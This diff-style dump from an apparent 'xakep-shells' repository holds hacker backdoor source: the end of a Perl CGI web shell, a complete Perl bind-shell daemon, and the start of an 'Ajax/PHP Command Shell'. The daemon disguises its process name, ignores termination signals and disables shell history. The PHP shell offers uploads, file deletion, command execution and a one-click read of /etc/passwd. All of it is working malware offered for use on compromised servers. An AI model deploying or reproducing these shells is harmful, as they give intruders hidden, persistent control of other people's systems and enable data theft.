|
||||
print "<code>Failed to download $SendFile: $!</code>";
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user downloads a file. It displays a message
|
||||
# to the user and provides a link through which the file can be downloaded.
|
||||
# This function is also called when the user clicks on that link. In this case,
|
||||
# the file is read and sent to the browser.
|
||||
#------------------------------------------------------------------------------
|
||||
sub BeginDownload
|
||||
{
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to upload a file. If the
|
||||
# file is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it starts the upload process.
|
||||
#------------------------------------------------------------------------------
|
||||
sub UploadFile
|
||||
{
|
||||
# if no file is specified, print the upload form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileUploadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
&PrintPageHeader("c");
|
||||
|
||||
# start the uploading process
|
||||
print "<code>Uploading $TransferFile to $CurrentDir...<br>";
|
||||
|
||||
# get the fullly qualified pathname of the file to be created
|
||||
chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TransferFile =~ m!([^/^\\]*)$!;
|
||||
$TargetName .= $PathSep.$1;
|
||||
|
||||
$TargetFileSize = length($in{'filedata'});
|
||||
# if the file exists and we are not supposed to overwrite it
|
||||
if(-e $TargetName && $Options ne "overwrite")
|
||||
{
|
||||
print "Failed: Destination file already exists.<br>";
|
||||
}
|
||||
else # file is not present
|
||||
{
|
||||
if(open(UPLOADFILE, ">$TargetName"))
|
||||
{
|
||||
binmode(UPLOADFILE) if $WinNT;
|
||||
print UPLOADFILE $in{'filedata'};
|
||||
close(UPLOADFILE);
|
||||
print "Transfered $TargetFileSize Bytes.<br>";
|
||||
print "File Path: $TargetName<br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Failed: $!<br>";
|
||||
}
|
||||
}
|
||||
print "</code>";
|
||||
&PrintCommandLineInputForm;
|
||||
&PrintPageFooter;
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# This function is called when the user wants to download a file. If the
|
||||
# filename is not specified, it displays a form allowing the user to specify a
|
||||
# file, otherwise it displays a message to the user and provides a link
|
||||
# through which the file can be downloaded.
|
||||
#------------------------------------------------------------------------------
|
||||
sub DownloadFile
|
||||
{
|
||||
# if no file is specified, print the download form again
|
||||
if($TransferFile eq "")
|
||||
{
|
||||
&PrintPageHeader("f");
|
||||
&PrintFileDownloadForm;
|
||||
&PrintPageFooter;
|
||||
return;
|
||||
}
|
||||
|
||||
# get fully qualified path of the file to be downloaded
|
||||
if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
|
||||
(!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
|
||||
{
|
||||
$TargetFile = $TransferFile;
|
||||
}
|
||||
else # path is relative
|
||||
{
|
||||
chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
|
||||
$TargetFile .= $PathSep.$TransferFile;
|
||||
}
|
||||
|
||||
if($Options eq "go") # we have to send the file
|
||||
{
|
||||
&SendFileToBrowser($TargetFile);
|
||||
}
|
||||
else # we have to send only the link page
|
||||
{
|
||||
&PrintDownloadLinkPage($TargetFile);
|
||||
}
|
||||
}
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Main Program - Execution Starts Here
|
||||
#------------------------------------------------------------------------------
|
||||
&ReadParse;
|
||||
&GetCookies;
|
||||
|
||||
$ScriptLocation = $ENV{'SCRIPT_NAME'};
|
||||
$ServerName = $ENV{'SERVER_NAME'};
|
||||
$LoginPassword = $in{'p'};
|
||||
$RunCommand = $in{'c'};
|
||||
$TransferFile = $in{'f'};
|
||||
$Options = $in{'o'};
|
||||
|
||||
$Action = $in{'a'};
|
||||
$Action = "login" if($Action eq ""); # no action specified, use default
|
||||
|
||||
# get the directory in which the commands will be executed
|
||||
$CurrentDir = $in{'d'};
|
||||
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
|
||||
|
||||
$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;
|
||||
|
||||
if($Action eq "login" || !$LoggedIn) # user needs/has to login
|
||||
{
|
||||
&PerformLogin;
|
||||
}
|
||||
elsif($Action eq "command") # user wants to run a command
|
||||
{
|
||||
&ExecuteCommand;
|
||||
}
|
||||
elsif($Action eq "upload") # user wants to upload a file
|
||||
{
|
||||
&UploadFile;
|
||||
}
|
||||
elsif($Action eq "download") # user wants to download a file
|
||||
{
|
||||
&DownloadFile;
|
||||
}
|
||||
elsif($Action eq "logout") # user wants to logout
|
||||
{
|
||||
&PerformLogout;
|
||||
}
|
462
xakep-shells/PERL/telnetd.pl.txt
Normal file
462
xakep-shells/PERL/telnetd.pl.txt
Normal file
|
@ -0,0 +1,462 @@
|
|||
#!/usr/bin/perl
|
||||
# Telnet-like Standard Daemon 0.7
|
||||
#
|
||||
# 0ldW0lf - oldwolf@atrixteam.net
|
||||
# - old-wolf@zipmai.com
|
||||
# - www.atrix.cjb.net
|
||||
# - www.atrixteam.net
|
||||
#
|
||||
# For those guys that still like to open ports
|
||||
# and use non-rooted boxes
|
||||
#
|
||||
# This has been developed to join in the TocToc
|
||||
# project code, now it's done and I'm distributing
|
||||
# this separated
|
||||
#
|
||||
# This one i made without IO::Pty so it uses
|
||||
# only standard modules... enjoy it
|
||||
#
|
||||
# tested on linux boxes.. probably will work fine on others
|
||||
# any problem... #atrix@irc.brasnet.org
|
||||
#
|
||||
|
||||
##########################################################
|
||||
# ******************* CONFIGURATION ******************** #
|
||||
##########################################################
|
||||
my $PORT = $ARGV[0] || 3847; # default port is 3847
|
||||
my $PASS = ''; # encripted password
|
||||
my $SHELL = "/bin/bash"; # shell to be executed
|
||||
my $HOME = "/tmp"; # your HOME
|
||||
my $PROC = "inetd"; # name of the process
|
||||
my $PASS_PROMPT = "Password: "; # password prompt
|
||||
my $WRONG_PASS = "Wrong password!"; # "wrong password" message
|
||||
my @STTY = ('sane', 'dec'); # stty arguments
|
||||
##########################################################
|
||||
|
||||
# feel free to change the ENV
|
||||
#### ENVironment ####
|
||||
$ENV{HOME} = $HOME;
|
||||
#$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
|
||||
# colorful PS1 is also funny :)
|
||||
$ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
|
||||
$ENV{MAIL} = '/var/mail/root';
|
||||
$ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
|
||||
$ENV{HISTFILE} = '/dev/null';
|
||||
$ENV{USER} = 'root';
|
||||
$ENV{LOGNAME} = 'root';
|
||||
$ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
|
||||
$ENV{LS_COLORS} = 'no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.bz2=01;31:*.rpm=01;31:*.deb=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.mpg=01;37:*.avi=01;37:*.mov=01;37:';
|
||||
$ENV{SHELL} = $SHELL;
|
||||
$ENV{TERM} = 'xterm';
|
||||
#####################
|
||||
|
||||
$0=$PROC."\0";
|
||||
|
||||
use IO::Socket;
|
||||
use IO::Select;
|
||||
use POSIX;
|
||||
use strict;
|
||||
|
||||
# i wouldn't change that
|
||||
# if i were you
|
||||
###### SIGnals ######
|
||||
$SIG{HUP} = 'IGNORE';
|
||||
$SIG{PS} = 'IGNORE';
|
||||
$SIG{TERM} = 'IGNORE';
|
||||
$SIG{CHLD} = sub { wait; };
|
||||
#####################
|
||||
|
||||
|
||||
# ioctl stuff
|
||||
my %IOCTLDEF;
|
||||
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
|
||||
$IOCTLDEF{TIOCNOTTY} = 0x5422;
|
||||
$IOCTLDEF{TIOCSCTTY} = 0x540E;
|
||||
safeload('sys/ttycom.ph', 1); # BSD
|
||||
safeload('sys/ioctl.ph', 1);
|
||||
safeload('asm/ioctls.ph', 1);
|
||||
|
||||
foreach my $IOCTL (keys(%IOCTLDEF)) {
|
||||
next if (defined(&{$IOCTL}));
|
||||
|
||||
if (open(IOD, "< /usr/include/asm/ioctls.h")) { # linux
|
||||
while(<IOD>) {
|
||||
if (/^\#define\s+$IOCTL\s+(.*?)\n$/) {
|
||||
eval "sub $IOCTL () {$1;}";
|
||||
last;
|
||||
}
|
||||
}
|
||||
close(IOD);
|
||||
}
|
||||
|
||||
# i realy dunno if i can do that.. but.. here it goes
|
||||
eval "sub $IOCTL () { $IOCTLDEF{$IOCTL};}" unless (defined(&{$IOCTL}));
|
||||
}
|
||||
|
||||
|
||||
# starting...
|
||||
$PORT = $ARGV[0] if ($ARGV[0]);
|
||||
chdir('/');
|
||||
|
||||
no strict 'refs';
|
||||
my $bindfd = *{'bind_sock'};
|
||||
*{$bindfd}= IO::Socket::INET->new(Listen => 1, LocalPort => $PORT, Proto => "tcp") || die "could not listen on port $PORT: $!";
|
||||
my $bind = \*{$bindfd};
|
||||
|
||||
my $pid = fork();
|
||||
die "ERROR: I could not fork() the process." unless defined($pid);
|
||||
exit if $pid;
|
||||
|
||||
|
||||
my %CLIENT;
|
||||
my $sel_serv = IO::Select->new($bind);
|
||||
my $sel_shell = IO::Select->new();
|
||||
|
||||
|
||||
# main loop...
|
||||
while ( 1 ) {
|
||||
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
|
||||
|
||||
read_clients();
|
||||
read_shells();
|
||||
}
|
||||
|
||||
sub read_clients {
|
||||
map { read_client($_) } ($sel_serv->can_read(0.01));
|
||||
}
|
||||
|
||||
sub read_client {
|
||||
my $fh = shift;
|
||||
|
||||
if ($fh eq $bind) {
|
||||
my $newcon = $bind->accept;
|
||||
$sel_serv->add($newcon);
|
||||
$CLIENT{$newcon}->{senha} = 0;
|
||||
$CLIENT{$newcon}->{sock} = $newcon;
|
||||
$fh->autoflush(1);
|
||||
do_client($newcon, '3', '5', '1');
|
||||
sleep(1);
|
||||
write_client($newcon, $PASS_PROMPT) if ($PASS_PROMPT);
|
||||
} else {
|
||||
my $msg;
|
||||
my $nread = sysread($fh, $msg, 1024);
|
||||
|
||||
if ($nread == 0) {
|
||||
close_client($fh);
|
||||
} else {
|
||||
telnet_parse($fh, $msg);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub read_shells {
|
||||
map { read_shell($_) } ($sel_shell->can_read(0.01));
|
||||
}
|
||||
|
||||
sub telnet_parse {
|
||||
my ($cli, $msg) = @_;
|
||||
my $char = (split('', $msg))[0];
|
||||
|
||||
if (ord($char) == 255) {
|
||||
chr_parse($cli, $msg);
|
||||
} else {
|
||||
if ($CLIENT{$cli}->{senha} == 0) {
|
||||
$CLIENT{$cli}->{buf} .= $msg;
|
||||
|
||||
return() unless ($msg =~ /\r|\n/);
|
||||
|
||||
my $pass = $CLIENT{$cli}->{buf};
|
||||
$CLIENT{$cli}->{buf} = '';
|
||||
|
||||
$pass =~ s/\n//g;
|
||||
$pass =~ s/\0//g;
|
||||
$pass =~ s/\r//g;
|
||||
|
||||
if (crypt($pass, $PASS) ne $PASS) {
|
||||
finish_client($cli, "\r\n\r".$WRONG_PASS."\r\n\r");
|
||||
} else {
|
||||
$CLIENT{$cli}->{senha} = 1;
|
||||
write_client($cli, chr(255).chr(253).chr(31));
|
||||
write_client($cli, "\r\n\r\r\n\r");
|
||||
new_shell($cli);
|
||||
}
|
||||
return();
|
||||
}
|
||||
|
||||
$msg =~ s/\r\n\0\0//g;
|
||||
$msg =~ s/\0//g;
|
||||
$msg =~ s/\r\n/\n/g;
|
||||
write_shell($cli, $msg);
|
||||
}
|
||||
}
|
||||
|
||||
sub read_shell {
|
||||
my $shell = shift;
|
||||
my $cli;
|
||||
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
|
||||
|
||||
my $msg;
|
||||
my $nread = sysread($shell, $msg, 1024);
|
||||
|
||||
if ($nread == 0) {
|
||||
finish_client($cli, "Terminal closed.\r\n\r");
|
||||
} else {
|
||||
write_client($cli, $msg);
|
||||
}
|
||||
}
|
||||
|
||||
sub to_chr {
|
||||
my $chrs = '';
|
||||
map { $chrs .= chr($_) } (split(/ +/, shift));
|
||||
return($chrs);
|
||||
}
|
||||
|
||||
sub do_client {
|
||||
my ($client, @codes) = @_;
|
||||
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
|
||||
}
|
||||
|
||||
|
||||
sub chr_parse {
|
||||
my ($client, $chrs) = @_;
|
||||
|
||||
my $ords = '';
|
||||
map { $ords .= ord($_).' ' } (split(//, $chrs));
|
||||
my $msg = '';
|
||||
|
||||
|
||||
if ($ords =~ /255 250 31 (\d+) (\d+) (\d+) (\d+)/) {
|
||||
my $winsize = pack('C4', $4, $3, $2, $1);
|
||||
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# || die "erro: $!";
|
||||
}
|
||||
|
||||
foreach my $code (split("255 ", $ords)) {
|
||||
if ($code =~ /(\d+) (.*)$/) {
|
||||
my $codes = $2;
|
||||
if ($1 == 251) {
|
||||
# do whatever you want dude ehehe
|
||||
$msg .= chr(255).chr(253);
|
||||
|
||||
map { $msg .= chr($_) } (split(/ +/, $codes));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
write_client($client, $msg) if ($msg);
|
||||
return(1);
|
||||
}
|
||||
|
||||
sub new_shell {
|
||||
my $cli = shift;
|
||||
|
||||
POSIX::setpgid(0, 0);
|
||||
|
||||
my ($tty, $pty);
|
||||
|
||||
unless (($tty, $pty) = open_tty($cli)) {
|
||||
finish_client($cli, "ERROR: No more pty?s avaliable\n");
|
||||
return(undef);
|
||||
}
|
||||
|
||||
my $pid = fork();
|
||||
if (not defined($pid)) {
|
||||
finish_client($cli, "ERROR: fork()\n");
|
||||
return(undef);
|
||||
}
|
||||
|
||||
unless($pid) {
|
||||
close($pty);
|
||||
|
||||
local(*DEVTTY);
|
||||
|
||||
if (open (DEVTTY, "/dev/tty")) {
|
||||
ioctl(DEVTTY, &TIOCNOTTY, 0 );# || die "erro: $!";
|
||||
close(DEVTTY);
|
||||
}
|
||||
|
||||
POSIX::setsid();
|
||||
ioctl($tty, &TIOCSCTTY, 0);# || die "erro: $!";
|
||||
|
||||
open (STDIN, "<&".fileno($tty)) || die "I could not reopen STDIN: $!";
|
||||
open (STDOUT, ">&".fileno($tty)) || die "I could not reopen STDOUT: $!";
|
||||
open (STDERR, ">&".fileno($tty)) || die "I could not reopen STDERR: $!";
|
||||
close($tty);
|
||||
|
||||
sleep(1);
|
||||
|
||||
foreach my $stty ("/bin/stty", "/usr/bin/stty") {
|
||||
next unless (-x $stty);
|
||||
map { system("$stty", $_) } @STTY;
|
||||
}
|
||||
|
||||
chdir("$HOME");
|
||||
{ exec("$SHELL") };
|
||||
|
||||
syswrite(STDOUT, "\n\nERROR: exec($SHELL)\n\nI could not execute the shell ($SHELL)\nHowever you are lucky :P\nYou can use the \"I'm FUCKED!\" mode and fix up this thing...\nTip: Find some shell and execute it ;)\n\n");
|
||||
syswrite(STDOUT, "\n\nOK! I'm Fucked mode.\n");
|
||||
syswrite(STDOUT, "Type ^C to exit\n\nI'm FuCKeD!# ");
|
||||
|
||||
while (my $msg = <STDIN>) {
|
||||
$msg =~ s/\n$//;
|
||||
$msg =~ s/\r$//;
|
||||
|
||||
if ($msg =~ /^\s*cd\s+(\S+)/) {
|
||||
my $notf = "directory $1 not found!\n";
|
||||
chdir($1) || syswrite(STDOUT, $notf, length($notf));
|
||||
} else {
|
||||
system("$msg 2>&1");
|
||||
}
|
||||
syswrite(STDOUT, "I'm FuCKeD!# ");
|
||||
}
|
||||
|
||||
exit;
|
||||
}
|
||||
close($tty);
|
||||
|
||||
select($pty); $| = 1;
|
||||
select(STDOUT);
|
||||
|
||||
set_raw($pty);
|
||||
|
||||
$CLIENT{$cli}->{shell} = $pty;
|
||||
$sel_shell->add($pty);
|
||||
|
||||
return(1);
|
||||
}
|
||||
|
||||
|
||||
|
||||
# Funciton set_raw() stolen from IO::Pty
|
||||
sub set_raw($) {
|
||||
my $self = shift;
|
||||
return 1 if not POSIX::isatty($self);
|
||||
my $ttyno = fileno($self);
|
||||
my $termios = new POSIX::Termios;
|
||||
unless ($termios) {
|
||||
# warn "set_raw: new POSIX::Termios failed: $!";
|
||||
return undef;
|
||||
}
|
||||
unless ($termios->getattr($ttyno)) {
|
||||
# warn "set_raw: getattr($ttyno) failed: $!";
|
||||
return undef;
|
||||
}
|
||||
$termios->setiflag(0);
|
||||
$termios->setoflag(0);
|
||||
$termios->setlflag(0);
|
||||
$termios->setcc(&POSIX::VMIN, 1);
|
||||
$termios->setcc(&POSIX::VTIME, 0);
|
||||
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
|
||||
# warn "set_raw: setattr($ttyno) failed: $!";
|
||||
return undef;
|
||||
}
|
||||
return 1;
|
||||
}
|
||||
|
||||
sub open_tty {
|
||||
no strict;
|
||||
my $cli = shift;
|
||||
my ($PTY, $TTY) = (*{"pty.$cli"}, *{"tty.$cli"}); # believe me old versions :/
|
||||
|
||||
|
||||
for (my $i = 0; $i < 256; $i++) {
|
||||
my $pty = get_tty($i, "/dev/pty");
|
||||
next unless (open($PTY, "+> $pty"));
|
||||
|
||||
my $tty = get_tty($i, "/dev/tty");
|
||||
|
||||
unless(open($TTY, "+> $tty")) {
|
||||
close($PTY);
|
||||
next;
|
||||
}
|
||||
|
||||
return($TTY, $PTY);
|
||||
|
||||
}
|
||||
|
||||
return();
|
||||
}
|
||||
|
||||
sub get_tty {
|
||||
my ($num, $base) = @_;
|
||||
|
||||
my @series = ('p' .. 'z', 'a' .. 'e');
|
||||
my @subs = ('0' .. '9', 'a' .. 'f');
|
||||
|
||||
my $buf = $base;
|
||||
$buf .= @series[($num >> 4) & 0xF];
|
||||
$buf .= @subs[$num & 0xF];
|
||||
|
||||
return($buf);
|
||||
}
|
||||
|
||||
sub safeload {
|
||||
my ($module, $require, $arg) = @_;
|
||||
my $file = $module;
|
||||
$file =~ s/::/\//g;
|
||||
|
||||
if ($require) {
|
||||
# all found gonna be loaded
|
||||
map { eval ("require \"$_/$file\";") if(-f "$_/$file"); } @INC;
|
||||
} else {
|
||||
$file .= ".pm" unless ($file =~ /(\.pm|\.ph)$/);
|
||||
return(eval("use $module $arg;")) if (grep { -f "$_/$file" } @INC);
|
||||
}
|
||||
|
||||
return();
|
||||
}
|
||||
|
||||
sub write_shell {
|
||||
my ($cli, $msg) = @_;
|
||||
my $shell = $CLIENT{$cli}->{shell};
|
||||
|
||||
return(undef) unless ($shell);
|
||||
|
||||
foreach my $m (split_chars($msg, 20)) {
|
||||
read_shells();
|
||||
print $shell $m;
|
||||
read_shells();
|
||||
}
|
||||
return(1);
|
||||
}
|
||||
|
||||
sub split_chars {
|
||||
my ($msg, $nchars) = @_;
|
||||
|
||||
my @splited;
|
||||
my @chrs = split ('', $msg);
|
||||
my $done = 0;
|
||||
while ( 1 ) {
|
||||
my $splited = join('', @chrs[$done .. ($done+$nchars-1)]);
|
||||
$done += $nchars;
|
||||
last if (length($splited) < 1);
|
||||
push(@splited, $splited);
|
||||
}
|
||||
return(@splited);
|
||||
}
|
||||
|
||||
sub finish_client {
|
||||
my ($cli, $msg) = @_;
|
||||
write_client($cli, $msg);
|
||||
close_client($cli);
|
||||
}
|
||||
|
||||
sub close_client {
|
||||
my $cli = shift;
|
||||
my $sock = $CLIENT{$cli}->{sock};
|
||||
|
||||
$sel_serv->remove($sock);
|
||||
if ($CLIENT{$cli}->{shell}) {
|
||||
my $shell = $CLIENT{$cli}->{shell};
|
||||
$sel_shell->remove($shell);
|
||||
close($shell);
|
||||
}
|
||||
$sock->close() if($sock);
|
||||
delete($CLIENT{$cli});
|
||||
}
|
||||
|
||||
sub write_client {
|
||||
my ($cli, $msg) = @_;
|
||||
my $sock = $CLIENT{$cli}->{sock};
|
||||
syswrite($sock, $msg, length($msg)) if ($sock);
|
||||
}
|
||||
|
8340
xakep-shells/PHP/1.txt
Normal file
8340
xakep-shells/PHP/1.txt
Normal file
File diff suppressed because one or more lines are too long
1990
xakep-shells/PHP/2008.php.php.txt
Normal file
1990
xakep-shells/PHP/2008.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
646
xakep-shells/PHP/Ajax_PHP Command Shell.php.txt
Normal file
646
xakep-shells/PHP/Ajax_PHP Command Shell.php.txt
Normal file
|
@ -0,0 +1,646 @@
|
|||
<?php
|
||||
session_start();
|
||||
|
||||
error_reporting(0);
|
||||
|
||||
$password = "password"; //Change this to your password ;)
|
||||
|
||||
$version = "0.7B";
|
||||
|
||||
$functions = array('Clear Screen' => 'ClearScreen()',
|
||||
'Clear History' => 'ClearHistory()',
|
||||
'Can I function?' => "runcommand('canirun','GET')",
|
||||
'Get server info' => "runcommand('showinfo','GET')",
|
||||
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
|
||||
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
|
||||
'Running processes' => "runcommand('ps -aux','GET')",
|
||||
'Readme' => "runcommand('shellhelp','GET')"
|
||||
|
||||
);
|
||||
$thisfile = basename(__FILE__);
|
||||
|
||||
$style = '<style type="text/css">
|
||||
.cmdthing {
|
||||
border-top-width: 0px;
|
||||
font-weight: bold;
|
||||
border-left-width: 0px;
|
||||
font-size: 10px;
|
||||
border-left-color: #000000;
|
||||
background: #000000;
|
||||
border-bottom-width: 0px;
|
||||
border-bottom-color: #FFFFFF;
|
||||
color: #FFFFFF;
|
||||
border-top-color: #008000;
|
||||
font-family: verdana;
|
||||
border-right-width: 0px;
|
||||
border-right-color: #000000;
|
||||
}
|
||||
input,textarea {
|
||||
border-top-width: 1px;
|
||||
font-weight: bold;
|
||||
border-left-width: 1px;
|
||||
font-size: 10px;
|
||||
border-left-color: #FFFFFF;
|
||||
background: #000000;
|
||||
border-bottom-width: 1px;
|
||||
border-bottom-color: #FFFFFF;
|
||||
color: #FFFFFF;
|
||||
border-top-color: #FFFFFF;
|
||||
font-family: verdana;
|
||||
border-right-width: 1px;
|
||||
border-right-color: #FFFFFF;
|
||||
}
|
||||
A:hover {
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
|
||||
table,td,div {
|
||||
border-collapse: collapse;
|
||||
border: 1px solid #FFFFFF;
|
||||
}
|
||||
body {
|
||||
color: #FFFFFF;
|
||||
font-family: verdana;
|
||||
}
|
||||
</style>';
|
||||
$sess = __FILE__.$password;
|
||||
if(isset($_POST['p4ssw0rD']))
|
||||
{
|
||||
if($_POST['p4ssw0rD'] == $password)
|
||||
{
|
||||
$_SESSION[$sess] = $_POST['p4ssw0rD'];
|
||||
}
|
||||
else
|
||||
{
|
||||
die("Wrong password");
|
||||
}
|
||||
|
||||
}
|
||||
if($_SESSION[$sess] == $password)
|
||||
{
|
||||
if(isset($_SESSION['workdir']))
|
||||
{
|
||||
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
|
||||
{
|
||||
chdir($_SESSION['workdir']);
|
||||
}
|
||||
}
|
||||
|
||||
if(isset($_FILES['uploadedfile']['name']))
|
||||
{
|
||||
$target_path = "./";
|
||||
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
|
||||
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
if(isset($_GET['runcmd']))
|
||||
{
|
||||
|
||||
$cmd = $_GET['runcmd'];
|
||||
|
||||
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
|
||||
|
||||
if($cmd == "")
|
||||
{
|
||||
print "Empty Command..type \"shellhelp\" for some ehh...help";
|
||||
}
|
||||
|
||||
elseif($cmd == "upload")
|
||||
{
|
||||
print '<br>Uploading to: '.realpath(".");
|
||||
if(is_writable(realpath(".")))
|
||||
{
|
||||
print "<br><b>I can write to this directory</b>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
|
||||
}
|
||||
|
||||
}
|
||||
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
|
||||
{
|
||||
if(file_exists($file[1]) && is_dir($file[1]))
|
||||
{
|
||||
chdir($file[1]);
|
||||
$_SESSION['workdir'] = $file[1];
|
||||
print "Current directory changed to ".$file[1];
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Directory not found";
|
||||
}
|
||||
}
|
||||
|
||||
elseif(strtolower($cmd) == "shellhelp")
|
||||
{
|
||||
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
|
||||
© By Ironfist
|
||||
|
||||
The shell can be used by anyone to command any server, the main purpose was
|
||||
to create a shell that feels as dynamic as possible, is expandable and easy
|
||||
to understand.
|
||||
|
||||
If one of the command execution functions work, the shell will function fine.
|
||||
Try the "canirun" command to check this.
|
||||
|
||||
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
|
||||
not used to these commands, google a little.
|
||||
|
||||
<b>Custom Functions</b>
|
||||
If you want to add your own custom command in the Quick Commands list, check
|
||||
out the code. The $function array contains \'func name\' => \'javascript function\'.
|
||||
Take a look at the built-in functions for examples.
|
||||
|
||||
I know this readme isn\'t providing too much information, but hell, does this shell
|
||||
even require one :P
|
||||
|
||||
- Iron
|
||||
';
|
||||
|
||||
}
|
||||
elseif(ereg("editfile (.*)",$cmd,$file))
|
||||
{
|
||||
if(file_exists($file[1]) && !is_dir($file[1]))
|
||||
{
|
||||
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
|
||||
$contents = file($file[1]);
|
||||
foreach($contents as $line)
|
||||
{
|
||||
print htmlspecialchars($line);
|
||||
}
|
||||
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "File not found.";
|
||||
}
|
||||
}
|
||||
elseif(ereg("deletefile (.*)",$cmd,$file))
|
||||
{
|
||||
if(is_dir($file[1]))
|
||||
{
|
||||
if(rmdir($file[1]))
|
||||
{
|
||||
print "Directory succesfully deleted.";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Couldn't delete directory!";
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
if(unlink($file[1]))
|
||||
{
|
||||
print "File succesfully deleted.";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Couldn't delete file!";
|
||||
}
|
||||
}
|
||||
}
|
||||
elseif(strtolower($cmd) == "canirun")
|
||||
{
|
||||
print "If any of these functions is Enabled, the shell will function like it should.<br>";
|
||||
if(function_exists(passthru))
|
||||
{
|
||||
print "Passthru: <b><font color=green>Enabled</b></font><br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Passthru: <b><font color=red>Disabled</b></font><br>";
|
||||
}
|
||||
|
||||
if(function_exists(exec))
|
||||
{
|
||||
print "Exec: <b><font color=green>Enabled</b></font><br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Exec: <b><font color=red>Disabled</b></font><br>";
|
||||
}
|
||||
|
||||
if(function_exists(system))
|
||||
{
|
||||
print "System: <b><font color=green>Enabled</b></font><br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "System: <b><font color=red>Disabled</b></font><br>";
|
||||
}
|
||||
if(function_exists(shell_exec))
|
||||
{
|
||||
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
|
||||
}
|
||||
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
|
||||
if( ini_get('safe_mode') ){
|
||||
print "Safe Mode: <b><font color=red>Enabled</b></font>";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Safe Mode: <b><font color=green>Disabled</b></font>";
|
||||
}
|
||||
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
|
||||
if( ini_get('open_basedir') ){
|
||||
print "Open_basedir: <b><font color=red>Enabled</b></font>";
|
||||
}
|
||||
else
|
||||
